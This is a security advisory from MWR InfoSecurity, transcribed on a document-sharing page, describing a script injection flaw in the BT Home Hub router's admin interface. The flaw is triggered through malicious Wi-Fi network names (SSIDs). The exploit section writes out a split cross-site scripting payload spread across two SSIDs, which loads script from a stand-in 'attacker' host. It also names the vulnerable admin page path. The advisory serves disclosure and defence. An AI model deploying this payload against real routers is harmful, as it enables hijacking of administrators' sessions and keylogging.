MWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May 2010. Contents



Similar documents
MWR InfoSecurity Security Advisory. pfsense DHCP Script Injection Vulnerability. 25 th July Contents

MWR InfoSecurity Advisory. Interwoven Worksite ActiveX Control Remote Code Execution. 10 th March Contents

Practical Exploitation Using A Malicious Service Set Identifier (SSID)

ETHICAL HACKING APPLICATIO WIRELESS110 00NETWORK APPLICATION MOBILE MOBILE0001

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com

Security Awareness. Wireless Network Security

SECURITY ADVISORY. December 2008 Barracuda Load Balancer admin login Cross-site Scripting

Basics of Internet Security

National Endowment for the Arts Evaluation Report. Table of Contents. Results of Evaluation Areas for Improvement Exit Conference...

Chapter 4 Customizing Your Network Settings

Recommended Practice Case Study: Cross-Site Scripting. February 2007

Penetration Test Report

Cross Site Scripting in Joomla Acajoom Component

Sitefinity Security and Best Practices

8 Steps for Network Security Protection

8 Steps For Network Security Protection

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

WebView addjavascriptinterface Remote Code Execution 23/09/2013

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

Overview. Summary of Key Findings. Tech Note PCI Wireless Guideline

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass

For more information on SQL injection, please refer to the Visa Data Security Alert, SQL Injection Attacks, available at

Business Internet Banking / Cash Management Fraud Prevention Best Practices

Miami University. Payment Card Data Security Policy

Business ebanking Fraud Prevention Best Practices

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

WIRELESS NETWORKING SECURITY

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Industrial Communication. Securing Industrial Wireless

Protecting Your Organisation from Targeted Cyber Intrusion

Appalachian Regional Commission Evaluation Report. Table of Contents. Results of Evaluation Areas for Improvement... 2

Concierge SIEM Reporting Overview

Penetration Testing Report Client: Business Solutions June 15 th 2015

WEB ATTACKS AND COUNTERMEASURES

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

Where every interaction matters.

Cyber Essentials Scheme

PCI DSS Policies Outline. PCI DSS Policies. All Rights Reserved. ecfirst Page 1 of 7

Information Security Assessment and Testing Services RFQ # Questions and Answers September 8, 2014

Why Web Applications are making a hackers life easy. Presented by Jon Grew BT SBS

PCI Security Scan Procedures. Version 1.0 December 2004

FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. Chapter 4 Finding Network Vulnerabilities

10 Things Every Web Application Firewall Should Provide Share this ebook

Securing Modern Substations With an Open Standard Network Security Solution. Kevin Leech Schweitzer Engineering Laboratories, Inc.

External Supplier Control Requirements

WiFi Security Assessments

DESIGNING AND DEPLOYING SECURE WIRELESS LANS. Karl McDermott Cisco Systems Ireland

Security Vulnerabilities and Patches Explained IT Security Bulletin for the Government of Canada

EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke

Web Security School Final Exam

PCI Compliance - A Realistic Approach. Harshul Joshi, CISM, CISA, CISSP Director, Information Technology CBIZ MHM hjoshi@cbiz.com

Securing your Linksys Wireless Router BEFW11S4 Abstract

CYBER ATTACKS EXPLAINED: THE MAN IN THE MIDDLE

Passing PCI Compliance How to Address the Application Security Mandates

Specific recommendations

Windows Remote Access

Web Application Security

Section 12 MUST BE COMPLETED BY: 4/22

THE TOP 4 CONTROLS.

PCI Compliance: Protection Against Data Breaches

Payment Card Industry (PCI) Data Security Standard

9 Simple steps to secure your Wi-Fi Network.

CORE Security and the Payment Card Industry Data Security Standard (PCI DSS)

The President s Critical Infrastructure Protection Board. Office of Energy Assurance U.S. Department of Energy 202/

Streamlining Web and Security

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Security Advisory. Some IPS systems can be easily fingerprinted using simple techniques.

VESZPROG ANTI-MALWARE TEST BATTERY

Managing Vulnerabilities for PCI Compliance White Paper. Christopher S. Harper Managing Director, Agio Security Services

VLANs. Application Note

JK0 015 CompTIA E2C Security+ (2008 Edition) Exam

Cyber - Security and Investigations. Ingrid Beierly August 18, 2008

CNA NetProtect Essential SM. 1. Do you implement virus controls and filtering on all systems? Background:

Emerging Network Security Threats and what they mean for internal auditors. December 11, 2013 John Gagne, CISSP, CISA

Automatic Hotspot Logon

Security+ Guide to Network Security Fundamentals, Fourth Edition. Chapter 6 Network Security

Best Practices Guide to Electronic Banking

Malicious Mitigation Strategy Guide

WLAN Attacks. Wireless LAN Attacks and Protection Tools. (Section 3 contd.) Traffic Analysis. Passive Attacks. War Driving. War Driving contd.

Wireless Network Analysis. Complete Network Monitoring and Analysis for a/b/g/n

Security Vulnerabilities in SOHO Routers Craig Heffner, Derek Yap

University of Hawaii at Manoa Professor: Kazuo Sugihara

2. From a control perspective, the PRIMARY objective of classifying information assets is to:

Chapter 4 Managing Your Network

CONNECTING THE RASPBERRY PI TO A NETWORK

Enhancing the Security of Corporate Wi-Fi Networks Using DAIR. Example : Rogue AP. Challenges in Building an Enterprise-scale WiFi Monitoring System

Topics in Network Security

Firewall and UTM Solutions Guide

SANS Institute First Five Quick Wins

Top 10 Security Checklist for SOHO Wireless LANs

Mobile Router MR600 User Guide

Chapter 2 Configuring Your Wireless Network and Security Settings

Transcription:

Contents MWR InfoSecurity Security Advisory BT Home Hub SSID Script Injection Vulnerability 10 th May 2010 2010-05-10 Page 1 of 8

Contents Contents 1 Detailed Vulnerability Description... 5 1.1 Technical Background... 5 1.2 Overview of Vulnerability... 5 1.3 Exploit Information... 6 1.4 Dependencies... 6 2 Recommendations... 7 3 References... 7 2010-05-10 Page 2 of 8

BT Home Hub SSID Script Injection Vulnerability BT Home Hub SSID Script Injection Vulnerability Package Name: BT Home Hub Wireless ADSL Router Date Discovered: May 2008 Vendor Contacted July 2008 Affected Versions: CVE Reference Author Severity Local/Remote Vulnerability Class Vendor Vendor Response Confirmed in Version 6.2.6.E. Hub 2 was not tested. Not Yet Assigned R. Dominguez Vega Medium Risk Remote SSID Script Injection BT Home Hub- http://www.homehub.bt.com/ The vendor has not addressed this issue and has accepted the risks exposed by this vulnerability. The risks exposed have been considered to be low by the vendor, due to the infrequent usage of the functionality by Home Hub users and the likelihood of the attack succeeding. Overview: The BT Home Hub provides wireless broadband solutions for home and office users. http://www.homehub.bt.com/ The BT Home Hub administrative web interface provides users with functionality, such as firewall configuration, telephony and DHCP. The BT Home Hub also supports the ability to add wireless repeaters supporting WDS (Wireless Distribution System). This functionality allows scanning for accessible wireless access points, the details of identified access point can be displayed in the administrative web interface. Impact: The BT Home Hub administrative web interface has been identified as being vulnerable to a script injection attack that could allow remote attackers to compromise the security of the device by performing Cross Site Scripting Attacks (XSS). http://www.owasp.org/index.php/top_10_2007-a1 Cause: Exploitation of this vulnerability is possible because the BT Home Hub administrative web interface does not properly sanitise parameters that are passed to it from identified access points. An attacker could set up a fake access point broadcasting specially crafted 802.11 beacon packets containing a malicious payload in the Service Set Identifier (SSID). 2010-05-10 Page 3 of 8

BT Home Hub SSID Script Injection Vulnerability The malicious SSID will be displayed in the Accessible Access Points Table page of the BT Home Hub administrative interface and will be executed when an administrator scans for wireless access points. Solution: A fix has not been implemented by the vendor and workaround to mitigate this vulnerability is unknown, therefore it is recommended that Home Hub users are aware of the risks this vulnerability exposes. Users avoiding the usage of the affected functionality will mitigate the risks exposed by the exploitation of this vulnerability. 2010-05-10 Page 4 of 8

Detailed Vulnerability Description 1 Detailed Vulnerability Description 1.1 Technical Background The 802.11 protocol is used in wireless local area network (WLAN) computer communication. The 802.11 protocol defines three main different packet types (data, management and control) used for communication, managing and controlling the wireless network. Wireless Access Points provide wireless communication between computers and a wired network. Access points periodically send management beacon packets in order to announce their presence and provide information such as their SSID, the encryption in use and other parameters associated with the access point. Wireless clients scan 802.11 radio channels for management beacons packets in order to choose an access point with which to associate. 1.2 Overview of Vulnerability The BT Home Hub web interface obtains information about the wireless access points which are in range from its inbuilt scan for access point functionality. An attacker could set up a fake access point broadcasting, to all wireless devices within range, specially crafted 802.11 beacon packets containing a malicious payload in the SSID. The malicious SSID will be displayed in the Accessible Access Points Table page of the BT Home Hub administrative interface (/cgi/b/_wds_/cfg/?ce=1&be=1&l0=5&l1=0) and executed when an administrator scans for wireless access points. The BT Home Hub web interface runs with administrative privileges and the malicious JavaScript code would be executed with the privileges of the user s browser. A screenshot of a JavaScript alert box being rendered on the Accessible Access Points Table page after a malicious management beacon packet was sent is included here: - Figure 1: JavaScript rendered on the Repeater page 2010-05-10 Page 5 of 8

Detailed Vulnerability Description It should be noted that SSIDs have a maximum length of 32 characters and in some situations, this may not be sufficient to inject a usable malicious payload for an attack. However, an attacker could set up two fake access points and deliver a payload using the combined content of both SSIDs. Such a payload of 64 characters would be enough to redirect users to a malicious web server. 1.3 Exploit Information One example of how this method could be used to compromise a device via this attack is outlined below. An attacker could set up two fake access point broadcasting specially crafted 802.11 beacon packets containing a malicious payload in the SSID. The injected code could be of the following form in the first access point: - <script src=//attacker/.j>/* The injected code could be of the following form in the second access point: - */</script> A malicious SSID combined together with the use of JavaScript comment tags (/* */) will make the following payload usable in an attack. This particular payload was chosen to minimise the space used in each SSID (this has a maximum size of 32 bytes) because even though the combination of both SSIDs allows a payload of 64 characters it is not possible to place JavaScript comment tags where desired. This prevents the 64 characters payload from being divided in two 32 byte SSIDs. <script src=//attacker/.j></script> This code would execute in the Access Point Table page and reference a malicious script (.j) located on a host under the attacker s control. The scope of this malicious script is very large and it could perform multiple actions from a phishing attack to browser key logging. Additionally, browser exploitation framework tools could be used by the attacker which would help to perform a more dynamic exploitation. It should be noted that this type of attack could be performed without alerting the targeted users of the attack. An attacker would try to be as unobtrusive as possible and hide malicious actions from the targeted user 1.4 Dependencies In the attack described in this advisory the attacker would need to be in wireless range of the target device and the affected device would need to be able to make a remote connection to the attacker s web server where the malicious script is hosted. It should be noted that an attacker could combine multiples payloads set in various SSIDs to perform an attack without requiring a connection to a remote web server. However in practical terms this would be more complex as it would require all of the malicious SSIDs to be rendered on the page in the correct order for the attack to be successfully executed. 2010-05-10 Page 6 of 8

Recommendations 2 Recommendations A fix has not been implemented by the vendor and workaround to mitigate this vulnerability is unknown, therefore it is recommended that Home Hub users are aware of the risks this vulnerability exposes. Users avoiding the usage of the affected functionality will mitigate the risks exposed by the exploitation of this vulnerability. 3 References BT Home Hub http://www.homehub.bt.com/ Top 10 2007 - Cross Site Scripting http://www.owasp.org/index.php/top_10_2007-a1 Whitepaper: Behind Enemy Lines http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf 2010-05-10 Page 7 of 8

BT Home Hub MWR SSID InfoSecurity Script Injection Vulnerability St. Clement House 1-3 Alencon Link Basingstoke, RG21 7SB Tel: +44 (0)1256 300920 Fax: +44 (0)1256 844083 mwrinfosecurity.com 2010-05-10 Page 8 of 8

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information